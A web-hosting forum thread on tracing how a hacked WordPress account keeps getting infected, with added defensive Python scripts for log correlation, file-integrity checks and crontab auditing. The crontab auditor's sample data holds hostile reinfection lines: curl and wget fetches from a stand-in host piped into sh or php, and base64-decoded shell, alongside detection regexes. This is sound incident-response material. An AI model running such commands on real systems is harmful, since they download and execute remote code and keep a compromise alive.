How to find out who is creating folders?
Hello Community.
Hope everybody is doing good.
We are currently struggling with one of our customers' accounts, which is being hacked on a daily basis now. That drives us crazy.
The customer is using a WordPress CMS, and there are a few content managers from India who use it to update content on a daily basis.
A week ago the customer reported that Google Ads had blocked his campaign because of a number of malware/virus complaints.
After we ran a scan, we located many folders and files that have no relation to WordPress.
Hey there! You mention that you are resetting the password for a user. Have you performed a virus scan on the user's machine(s) with access to that cPanel account? It's possible there could be keylogger software installed that is stealing the password and then using it to log in.
You can take the following actions to deal with the situation. To determine who creates folders on the website, check the website's server logs. The server logs will contain information about when and where the folders were created. Once you have access to the logs, look for entries corresponding to when the folders were created. The logs will show the IP address and other identifying information of the user who created the folders. In cases where the server logs do not provide enough information, you may need to look for other clues to determine who is creating the folders. Some steps you can take include:
- Look for accounts with administrative access or accounts that were created recently.
- Review file permissions.
- Set up alerts or notifications for any changes to the website or files.
- Limit access to the website from specific IP addresses or regions.
Bit of an old thread, but having faced this myself, I can recommend the following. We are running, amongst other things, CSF and maldet. With CSF we monitor troublesome sites with csf.dirwatch so that email alerts go out when directories change. With maldet, you can then xref inotify_log for the same time frame to see what other files are being created/modified and in what order. You can then xref these timestamps with Apache/FTP/cPanel access logs. Most of the time, we find password compromise is the culprit for these mystery infections, as simple things like shells being POST'd to are easy to catch simply by grepping logs.
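The cross-referencing step described in the two answers above (folder creation time from a dirwatch alert or inotify log, matched against the Apache access log for the same minute) is mechanical enough to script. The following is an added example, not code from the original thread or from CSF or maldet: it reduces each change event to a (timestamp, path) pair, parses combined-format Apache lines, and lists every request within a window around each event, POST requests first. The change events, the log lines, the IPs and the site paths are all constructed for the example, and the event timestamps are assumed to be in UTC (convert to your server's timezone before running it on real logs).

```python
import re
from datetime import datetime, timedelta, timezone

# Apache "combined" log format:
#   ip ident user [timestamp] "METHOD uri PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample: what a csf.dirwatch alert or a maldet inotify_log entry
# boils down to once you pull out the time and the path. Assumed to be UTC.
CHANGE_EVENTS = [
    ("2024-03-10 02:14:07", "/home/acme/public_html/wp-content/uploads/.cache/"),
    ("2024-03-10 02:14:09", "/home/acme/public_html/wp-content/uploads/.cache/x.php"),
]

# Constructed sample access log for the same site and time window.
ACCESS_LOG = """\
203.0.113.5 - - [10/Mar/2024:02:13:58 +0000] "GET /wp-login.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:02:14:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:02:14:06 +0000] "POST /wp-content/plugins/old-plugin/upload.php HTTP/1.1" 200 51 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:02:14:08 +0000] "GET /about/ HTTP/1.1" 200 8820 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:02:14:10 +0000] "POST /wp-content/uploads/.cache/x.php HTTP/1.1" 200 12 "-" "curl/8.0"
192.0.2.44 - - [10/Mar/2024:09:30:00 +0000] "GET / HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""


def parse_access_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = m.groupdict()
        entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
        entries.append(entry)
    return entries


def correlate(events, entries, window_seconds=30):
    """For each change event, collect the requests within +/- window_seconds.

    POST requests are listed first (that is where uploads and web-shell traffic
    show up), then ordered by how close they are to the event time."""
    results = []
    for ts_text, path in events:
        ts = datetime.strptime(ts_text, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
        lo, hi = ts - timedelta(seconds=window_seconds), ts + timedelta(seconds=window_seconds)
        hits = [e for e in entries if lo <= e["ts"] <= hi]
        hits.sort(key=lambda e: (e["method"] != "POST", abs((e["ts"] - ts).total_seconds())))
        results.append({"path": path, "time": ts, "requests": hits})
    return results


def suspect_ips(results):
    """Map each IP that POSTed inside any event window to the URIs it POSTed to."""
    ips = {}
    for r in results:
        for e in r["requests"]:
            if e["method"] == "POST":
                ips.setdefault(e["ip"], set()).add(e["uri"])
    return ips


if __name__ == "__main__":
    report = correlate(CHANGE_EVENTS, parse_access_log(ACCESS_LOG))
    for r in report:
        print(f"\n{r['time']:%Y-%m-%d %H:%M:%S} {r['path']}")
        for e in r["requests"]:
            print(f"  {e['ts']:%H:%M:%S} {e['ip']:<15} {e['method']:<4} {e['uri']} ({e['status']}) {e['ua']}")
    print("\nIPs that POSTed around the change times:")
    for ip, uris in suspect_ips(report).items():
        print(f"  {ip}: {', '.join(sorted(uris))}")
```

In the constructed data the same address logs in, POSTs to a plugin script a second before the hidden directory appears, and then POSTs to the new file, which is exactly the sequence the answer above says is easy to catch once the timestamps are lined up. The window is deliberately small; widen it if the filesystem clock and the web server log disagree.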
Hello. Yes, monitoring the folder will give you details about the file/directory changes. Carefully analyze the logs and identify the exact way the files were created: whether it was via FTP/login or via some script.
- Check all the existing plugins and remove unwanted plugins from WordPress.
- Go through the file manager for the file names; an experienced server administrator can easily detect the files if they use unusual file names, which may not be detected by normal users.
- Find the recently modified files in the plugins and themes folders, etc., and identify the modified files.
- Use WP-CLI tools to check the integrity of the WordPress files.
- Analyse the logs for POST requests and manually check whether those files are genuine.
- Do a scan, but we cannot confirm that the scan will detect all the files.
Overall, multiple areas need to be checked, and the account must be monitored for multiple days to identify the infection and clear it.
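Two of the bullets above (find recently modified files; check file integrity with WP-CLI) can be demonstrated together. `wp core verify-checksums` compares core files against the checksums WordPress.org publishes, but it does not cover plugins or themes, so for those you need a baseline of your own. The following is an added example, not part of the original thread and not WP-CLI code: it hashes a directory tree into a manifest, later reports files that were modified, added or removed relative to that manifest, and separately lists files touched within a given age, which is the `find -mtime` style check from the third bullet. The mini site it builds in a temporary directory, and the "tampering" it applies to it, are constructed for the demo.

```python
import hashlib
import os
import tempfile
import time
from pathlib import Path


def sha256_of(path):
    """Stream a file through SHA-256 so large uploads do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Hash every file under root; keys are POSIX-style paths relative to root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_of(p) for p in root.rglob("*") if p.is_file()}


def verify_tree(root, manifest):
    """Compare the tree against a known-good manifest (the same idea as
    `wp core verify-checksums`, but for any directory you have a baseline for)."""
    current = build_manifest(root)
    return {
        "modified": sorted(p for p in manifest if p in current and current[p] != manifest[p]),
        "added": sorted(p for p in current if p not in manifest),
        "missing": sorted(p for p in manifest if p not in current),
    }


def recently_modified(root, max_age_seconds, now=None):
    """Files whose mtime falls within max_age_seconds of now."""
    root = Path(root)
    now = time.time() if now is None else now
    return sorted(
        p.relative_to(root).as_posix()
        for p in root.rglob("*")
        if p.is_file() and now - p.stat().st_mtime <= max_age_seconds
    )


def demo():
    """Build a constructed mini site, baseline it, tamper with it, and report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        files = {
            "wp-includes/version.php": "<?php $wp_version = '6.4';",
            "wp-content/plugins/demo/demo.php": "<?php // demo plugin",
            "wp-content/themes/demo/style.css": "/* demo theme */",
        }
        a_month_ago = time.time() - 30 * 86400
        for rel, body in files.items():
            path = root / rel
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(body)
            os.utime(path, (a_month_ago, a_month_ago))  # pretend these were installed long ago
        manifest = build_manifest(root)  # the known-good baseline, taken while the site was clean

        # Constructed tampering: one plugin file edited, one file dropped into a hidden uploads dir.
        plugin = root / "wp-content/plugins/demo/demo.php"
        plugin.write_text(files["wp-content/plugins/demo/demo.php"] + "\n// appended later")
        dropped = root / "wp-content/uploads/.cache/x.php"
        dropped.parent.mkdir(parents=True)
        dropped.write_text("<?php // not part of any install")

        return {
            "integrity": verify_tree(root, manifest),
            "recent": recently_modified(root, 7 * 86400),
        }


if __name__ == "__main__":
    for section, value in demo().items():
        print(section, value)
```

On a real account you would take the manifest right after a clean install or a verified restore, store it outside public_html, and re-run the comparison whenever dirwatch or maldet fires. Note that mtime alone is weak evidence: an attacker who can write files can also reset their timestamps, which is why the hash comparison is the one to trust.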
A few other things.
- Check for cron jobs. We have seen a number of compromises that install cPanel account cron jobs that download/reinfect the site.
- If you have root access, learn how to use built-in auditing. Turning on auditing for the user's public_html folder will help you determine how files/folders are getting created.
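The cron-job check in the answer above is worth automating across every account on a box, because a reinfection cron is what turns a one-off cleanup into the daily hack the original poster describes. The following is an added example, not from the thread and not cPanel tooling: it parses the output you would get from `crontab -l -u <user>` (placeholder user name), separates the schedule from the command, and flags commands that download and pipe into an interpreter, decode base64 at run time, run from /tmp or /dev/shm, or execute from a hidden dot path. The sample crontab, including its legitimate wp-cron line, is constructed, and the hostnames use the reserved `.invalid` domain. For the auditing bullet, the corresponding auditd rule is a watch on the document root (`auditctl -w /home/<user>/public_html -p wa -k wp_writes`), which then records the process, user and syscall behind each write.

```python
import re

# Constructed sample of a cPanel user crontab, mixing the site's legitimate
# wp-cron call with the kind of entries seen after an account compromise.
SAMPLE_CRONTAB = """\
MAILTO=""
# run WordPress' scheduler from the shell instead of on page loads
0 3 * * * /usr/local/bin/php /home/acme/public_html/wp-cron.php >/dev/null 2>&1
*/5 * * * * curl -s http://example.invalid/x.txt | sh >/dev/null 2>&1
0 * * * * /bin/sh -c 'echo ZWNobyBoaQ== | base64 -d | sh'
30 2 * * * wget -q -O /tmp/.u http://example.invalid/u ; php /tmp/.u
@reboot /home/acme/.config/.s/run.sh
"""

# Each indicator is a human-readable reason plus the pattern that triggers it.
INDICATORS = [
    ("downloads and pipes into an interpreter",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sh|bash|php|perl|python\d?)\b")),
    ("decodes base64 at run time", re.compile(r"\bbase64\s+(-d|--decode)\b")),
    ("runs from /tmp or /dev/shm", re.compile(r"(^|\s|=)/(tmp|dev/shm)/")),
    ("uses a hidden (dot) path", re.compile(r"/\.[^/\s]+")),
    ("fetches remote content", re.compile(r"\b(curl|wget)\b")),
]

ENV_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")  # crontab variable assignments such as MAILTO=


def parse_crontab(text):
    """Return (line_no, schedule, command) for each job line.

    Comments, blank lines and environment assignments are skipped. A job is
    either '@reboot <cmd>' style or five schedule fields followed by the command
    (the per-user format; /etc/crontab has an extra user field)."""
    jobs = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ENV_RE.match(line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
            schedule, command = parts[0], parts[1] if len(parts) > 1 else ""
        else:
            parts = line.split(None, 5)
            schedule, command = " ".join(parts[:5]), parts[5] if len(parts) > 5 else ""
        jobs.append((n, schedule, command))
    return jobs


def audit_crontab(text):
    """List the jobs that match at least one indicator, with every reason that applies."""
    findings = []
    for n, schedule, command in parse_crontab(text):
        reasons = [label for label, rx in INDICATORS if rx.search(command)]
        if reasons:
            findings.append({"line": n, "schedule": schedule, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: [{f['schedule']}] {f['command']}")
        for reason in f["reasons"]:
            print(f"    - {reason}")
```

The indicators are deliberately broad: a legitimate backup job that uses curl will be reported too, and that is fine, because the point is to get a short list for a human to read rather than a verdict. Anything flagged should be compared against what the site owner actually scheduled before it is removed, and the account password and any API tokens rotated at the same time, since a cron entry the customer did not create means someone else has had write access to the account.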